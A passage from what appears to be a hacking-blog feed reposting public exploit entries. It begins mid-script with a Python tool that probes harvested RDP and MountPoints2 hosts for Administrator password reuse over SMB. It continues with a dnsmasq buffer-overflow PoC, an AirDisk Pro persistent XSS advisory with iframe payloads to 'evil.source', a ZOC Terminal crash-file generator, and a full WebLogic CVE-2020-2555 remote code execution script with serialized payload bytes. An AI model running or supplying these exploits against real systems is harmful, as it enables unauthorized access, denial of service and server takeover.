e: print("[!] "+str(e)) return False for x in tmp: idx = x.find("##") clean = x[idx:] idx2 = clean.rfind("#") ip = clean[2:idx2] ip = re.sub(r"#.*[A-Z,a-z]","",ip) if ip not in mntpoint2_connections: mntpoint2_connections.append(ip) mntpoint2_connections = list(filter(None, mntpoint2_connections)) p.kill() return mntpoint2_connections #Terminal server client stores remote server connections. def rdp_svrs(): global rdp_server_lst try: p = Popen(REG_RDPUSERS, stdout=PIPE, stderr=PIPE, shell=True) tmp = p.stdout.readlines() for key in tmp: if key.find("Servers")!=-1: pos = key.rfind("\\") srv = key[pos + 1:].replace("\r\n","").strip() rdp_server_lst.append(srv) p.kill() except Exception as e: print("[!] "+str(e)) return False return True #Disconnect def del_vuln_connection(ip): try: print("[!] Disconnecting vuln network logon connection.\n") call(r"net use "+DRIVE+":"+" /del") except Exception as e: print("[!] "+str(e)) #Check connection def chk_connection(ip): print("[+] Testing: "+ip) sys.stdout.flush() cmd = Popen(['ping.exe', ip, "-n", "1"], stderr=PIPE, stdout=PIPE, shell=True) stderr, stdout = cmd.communicate() if "Reply from" in stderr and "Destination host unreachable" not in stderr: print("[*] Target up!") return True else: print("[!] Target unreachable :(") return False #Test vuln def Test_Password_Reuse(ip): print("[+] Testing "+ip + " the builtin Administrator account.\n") sys.stdout.flush() try: p = Popen("net use X: \\\\"+ip+"\\c$ /user:Administrator", stdout=PIPE, stderr=PIPE, shell=True) err = p.stderr.readlines() if err: e = str(err) if e.find("error 53")!=-1: print("[*] Network path not found\n") return elif e.find("error 1219")!=-1: print("[*] Target connections to a server or shared resource by the same user, using more than one user name are disallowed.\n") return elif e.find("error 85")!=-1: print("[*] The local device name is already in use.\n") return else: print(e+"\n") tmp = p.stdout.read() if FINDME in tmp: print("[*] Password reuse for the built-in Administrator found!") print("[+] Connected to target: "+ ip) VULN_FOUND.add(ip+":Administrator") del_vuln_connection(ip) p.kill() except Exception as e: print("[!] "+str(e)) #Authenticate def auth(ip): action_process = Process(target=Test_Password_Reuse, args=(ip,)) action_process.start() action_process.join(timeout=5) action_process.terminate() if __name__ == "__main__": print(BANNER) print("[+] Windows 'net use' Network Logon Type-3") print("[+] Insufficient Password Prompt") print("[+] By hyp3rlinx\n") time.sleep(3) print("[+] Deleting any existing network logons to start clean.") #Make sure no exist sessions already exist. call(r"net use * /del /y") sys.stdout.flush() time.sleep(1) #Grab previous connections from MountPoints2 if any. rdp_svrs() svrlst=mountpoints2() if svrlst: svrlst + rdp_server_lst else: svrlst = rdp_server_lst if not svrlst: print("[*] No MountPoints2 artifacts found, enter an IP.") sys.stdout.flush() ip=raw_input("[+] Target IP> ") if chk_connection(ip): auth(ip) else: #We have MountPoints2 or RDP Server list IP we can try. for ip in svrlst: if chk_connection(ip): auth(ip) time.sleep(DELAY) if len(VULN_FOUND) != 0: print("[*] Located the following vulnerable systems:") sys.stdout.flush() for v in VULN_FOUND: print("[+] "+v) else: print("[+] All previous attempts failed, enter an IP and give it a shot!.") sys.stdout.flush() ip=raw_input("[+] Target IP> ") if chk_connection(ip): auth(ip) [POC Video URL] https://www.youtube.com/watch?v=Je93Neb0k8g [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: February 28, 2020 MSRC "behavior you are reporting is by design" : March 30, 2020 April 5, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
  22. HireHackking

    dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC) # Date: 2020-04-06 # Exploit Author: Josue Encinar # Software Link: https://launchpad.net/ubuntu/+source/dnsmasq/2.79-1 # Version: 2.79 # Tested on: Ubuntu 18.04 from subprocess import Popen, PIPE data = "" bof = False for i in range (1, 200): A = "A"*i data = f"dhcp_release {A} 1 1" try: result = Popen(data, stdout=PIPE, stderr=PIPE, shell=True) error = result.stderr.read().decode() if "Aborted (core dumped)" in error: print("[+] Buffer Overflow detected!") print(f"[*] Offset: {i}") bof = True break except Exception as e: print(f"[-] {e}") if not bof: print("[-] No buffer overflow...") ## Check line 273 in dhcp_release.c ### strcpy(ifr.ifr_name, argv[1]); # ## PoC: # josue@ubuntu:~/Escritorio/bof_dhcp$ python3 dhcp_release_bof.py # *** buffer overflow detected ***: dhcp_release terminated # [+] Buffer Overflow detected! # [*] Offset: 16
  23. HireHackking

    AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Title: AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting # Author: Vulnerability Laboratory # Date: 2020-04-15 # Vendor: http://www.app2pro.com # Software Link: https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 # CVE: N/A Document Title: =============== AirDisk Pro v5.5.3 iOS - Multiple Persistent Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2203 Release Date: ============= 2020-04-15 Vulnerability Laboratory ID (VL-ID): ==================================== 2203 Common Vulnerability Scoring System: ==================================== 4.5 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== File sharing with other iOS devices via Bluetooth or Wi-Fi connection with automatic search of nearest devices. Users can perform file operations on the application like: Copy, Move, Zip, Unzip, Rename, Delete, Email, and more. Easy to create file like: Text File, New folder, Playlist, Take Photo/Video, Import From Library, and Voice Record. AirDisk Pro allows you to store, view and manage files on your iPhone, iPad or iPod touch. You can connect to AirDisk Pro from any Mac or PC over the Wi-Fi network and transfer files by drag & drop files straight from the Finder or Windows Explorer. AirDisk Pro features document viewer, PDF reader, music player, image viewer, voice recorder, text editor, file manager and support most of the file operations: like delete, move, copy, email, share, zip, unzip and more. (Copy of the Homepage: https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 ) (Copy of the Homepage: http://www.app2pro.com ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the AirDisk Pro v5.5.3 ios mobile application. Affected Product(s): ==================== Felix Yew Product: AirDisk Pro v5.5.3 (iOS) Vulnerability Disclosure Timeline: ================================== 2020-04-15: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== No authentication (guest) User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ Multiple persistent cross site scripting vulnerability has been discovered in the official SuperBackup v2.0.5 ios mobile application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise the mobile web-application from the application-side. The first vulnerability is located in the `createFolder` parameter of the `Create Folder` function. Attackers are able to name or rename paths via airdisk pro ui to malicious persistent script codes. Thus allows to execute the persistent injected script code on the front site of the path index listing in the content itself on each refresh. The request method to inject is POST and the attack vector is located on the application-side. Interaction to exploit is as well possible through the unauthenticated started ftp service on the local network. The second vulnerability is located in the `deleteFile` parameter of the `Delete` function. The output location with the popup that asks for permission to delete, allows to execute the script code. The injection point is the file parameter and the execution point occurs in the visible delete popup with the permission question. The request method to inject is POST and the attack vector is located on the application-side. The third web vulnerability is located in the `devicename` parameter that is displayed on the top next to the airdisk pro ui logo. Remote attackers are able to inject own malicious persistent script code by manipulation of the local apple devicename information. The injection point is the devicename information and the execution point occurs in the file sharing ui panel of the airdisk pro mobile web-application. Remote attackers are able to inject own script codes to the client-side requested vulnerable web-application parameters. The attack vector of the vulnerability is persistent and the request method to inject/execute is POST. The vulnerabilities are classic client-side cross site scripting vulnerabilities. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] AirDisk pro Wifi UI Vulnerable Parameter(s): [+] createFolder [+] deleteFile [+] devicename Proof of Concept (PoC): ======================= The persistent input validation web vulnerabilities can be exploited by remote attackers with wifi access with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. 1. Create Folder PoC: Vulnerable Source <tbody> <form name="checkbox_form"></form> <tr><td class="e"><input type="checkbox" name="selection" value="test"></td><td class="i"><a href="test/"><img src="/webroot/fileicons/folder.png" width="20" height="20"></a></td><td class="n"><a href="test/">test</a></td><td class="m">11 Apr 2020 at 12:35</td><td class="s"></td><td class="k">Folder</td> <td class="e"><span style="height:15px; width:15px;">&nbsp;</span></td><td class="e"><a href="#" title="Rename file" onclick="modalPopup("test", 0, 0);"> <img src="/webroot/webrename.png" width="15" height="15"></a></td><td class="e"><a href="#" title="Delete file" onclick="modalPopup("test", 2, 0);"> <img src="/webroot/webdelete.png" width="15" height="15"></a></td></tr><tr class="c"><td class="e"><input type="checkbox" name="selection" value="test%3E%22%3Ciframe%20src=a%3E"></td><td class="i"><a href="[MALICIOUS INJECTED SCRIPT CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/"> <img src="/webroot/fileicons/folder.png" width="20" height="20"></a></td><td class="n"> <a href="[MALICIOUS INJECTED SCRIPT CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/">test>"<iframe src="evil.source"></a></td> <td class="m">11 Apr 2020 at 13:01</td><td class="s"></td><td class="k">Folder</td><td class="e"><span style="height:15px; width:15px;">&nbsp;</span></td><td class="e"> <a href="#" title="Rename file" onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E&quot[MALICIOUS INJECTED SCRIPT CODE!];, 0, 1);"> <img src="/webroot/webrename.png" width="15" height="15"/></a></td><td class="e"> <a href="#" title="Delete file" onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E&quot[MALICIOUS INJECTED SCRIPT CODE!];, 2, 1);"> <img src="/webroot/webdelete.png" width="15" height="15"/></a></td></tr><tr><td class="e"><input type="checkbox" name="selection" value="Help.webarchive" /></td> <td class="i"><a href="Help.webarchive"><img src="/webroot/fileicons/webarchive.png" width="20" height="20"></a></td><td class="n"> <a href="Help.webarchive">Help.webarchive</a></td><td class="m">6 Dec 2019 at 05:22</td><td class="s">13.7 KB</td><td class="k">Safari Web Archive</td> <td class="e"><a href="#" title="Download file" onClick="downloadFile("Help.webarchive");"><img src="/webroot/webdownload.png" width="15" height="15"/></a></td><td class="e"><a href="#" title="Rename file" onClick="modalPopup("Help.webarchive", 0, 2);"> <img src="/webroot/webrename.png" width="15" height="15"/></a></td><td class="e"><a href="#" title="Delete file" onClick="modalPopup("Help.webarchive", 2, 2);"><img src="/webroot/webdelete.png" width="15" height="15"/></a></td></tr> </form> </tbody> </table> </div> --- PoC Session logs [POST] --- http://localhost:80/ Host: localhost:80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 68 Origin: http://localhost:80 Connection: keep-alive Referer: http://localhost:80/ Upgrade-Insecure-Requests: 1 createFolder=test>"<[MALICIOUS INJECTED SCRIPT CODE!]>&ID=0&submitButton=Create - POST: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 6257 Note: Adding via ftp on mkdir or file is as well possible without authentication on default setup. 2. Delete / Old Popup PoC: Vulnerable Source <div id="modal-content" class="simplemodal-data" style="display: block;"> <div id="modal-title"><h3>Delete File</h3></div> <div id="modal-text"><a>Are you sure you want to delete this file?"test"</a></div> <form name="input" action="" method="post"> <div id="modal-field"><input type="hidden" name="deleteFile" value="test"<iframe src="evil.source">[MALICIOUS INJECTED SCRIPT CODE]"></div> <input type="hidden" name="ID" id="ID" value="test"> <input type="submit" name="submitButton" id="submitButton" value="Delete"> </form> </div> --- PoC Session logs [POST] --- http://localhost:80/ Host: localhost:80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 55 Origin: http://localhost:80 Connection: keep-alive Referer: http://localhost:80/evil.source Upgrade-Insecure-Requests: 1 deleteFile=New Folder&ID=New Folder&submitButton=Delete - POST: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 4699 Note: Comes up when somebody tries to delete the malicious injected path. 3. Devicename PoC: Vulnerable Source <div id="headerWraper"> <table border="0" cellspacing="0" cellpadding="0" width="100%"> <tr> <td><a href="./"><img src="/webroot/webicon.png" id="headerImg" width="57" height="57"/></a></td> <td><h2>[MALICIOUS INJECTED SCRIPT CODE AS DEVICENAME]</h2></td> </tr> </table> </div> --- PoC Session logs [GET] --- http://localhost:80/ Host: localhost:80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 55 Origin: http://localhost:80 Connection: keep-alive Referer: http://localhost:80/evil.source Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 4612 Note: Executes each time the wifi sharing ui service of airdisk pro is opened by the local or remote users. Solution - Fix & Patch: ======================= 1. Disallow special chars in the folder and filenames. Sanitize all inputs and filter all involved parameters to prevent application-side attacks. 2. Parse the output location of the popup permission message content to prevent further executions after injects via post method. 3. Sanitize the devicename displayed on top of the wifi user interaction by a secure parsing mechanism. Security Risk: ============== The security risk of the persistent input validation web vulnerabilities in the application functions are estimated as medium. Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM
  24. HireHackking

    ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC) # Discovery by: chuyreds # Discovery Date: 2020-04-05 # Vendor Homepage: https://www.emtec.com # Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe # Tested Version: 7.25.5 # Vulnerability Type: Local # Tested on OS: Windows 10 Pro x64 es # Steps to produce the crash: # 1.- Run python code: ZOC_7.25.5_Script.py and it will create a new file "exp.zrx" # 2.- Open ZOC Terminal # 3.- Select Script > Start REXX Script... # 4.- Select "ZOC_7.25.5_Script.zrx" file and click "open" # 5.- Crashed cod = "\x41" * 20000 f = open('ZOC_7.25.5_Script.zrx', 'w') f.write(cod) f.close()
  25. HireHackking

    Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution # Author: nu11secur1ty # Date: 2020-03-31 # Vendor: Oracle # Software Link: https://download.oracle.com/otn/nt/middleware/12c/122140/fmw_12.2.1.4.0_wls_Disk1_1of1.zip # Exploit link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-2555 # CVE: CVE-2020-2555 [+] Credits: Ventsislav Varbanovski (nu11secur1ty) [+] Source: readme from GitHUB [Exploit Program Code] -------------------------- #!/usr/bin/python # @nu11secur1ty import socket import os import sys import struct if len(sys.argv) < 3: print 'Usage: python %s <host> <port> </path/to/payload>' % os.path.basename(sys.argv[0]) sys.exit() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) server_address = (sys.argv[1], int(sys.argv[2])) print '[+] Connecting to %s port %s' % server_address sock.connect(server_address) # Send headers headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' print 'sending "%s"' % headers sock.sendall(headers) data = sock.recv(1024) print >>sys.stderr, 'received "%s"' % data payloadObj = open(sys.argv[3],'rb').read() payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' payload=payload+payloadObj payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' payload=struct.pack('>I',len(payload)) + payload[4:] print '[+] Sending payload...' sock.send(payload) data = sock.recv(1024) print >>sys.stderr, 'received "%s"' % data [Vendor] Oracle [Vulnerability Type] Network Remote [Description] Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation). Supported versions that are affected are 3.7.1.17, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle Coherence. Successful attacks of this vulnerability can result in takeover of Oracle Coherence. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). [Disclosure Timeline] 2019/12/10 [+] Disclaimer The entry creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE. [Video] https://www.youtube.com/watch?v=59jt8rr8ECc @nu11secur1ty -- hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty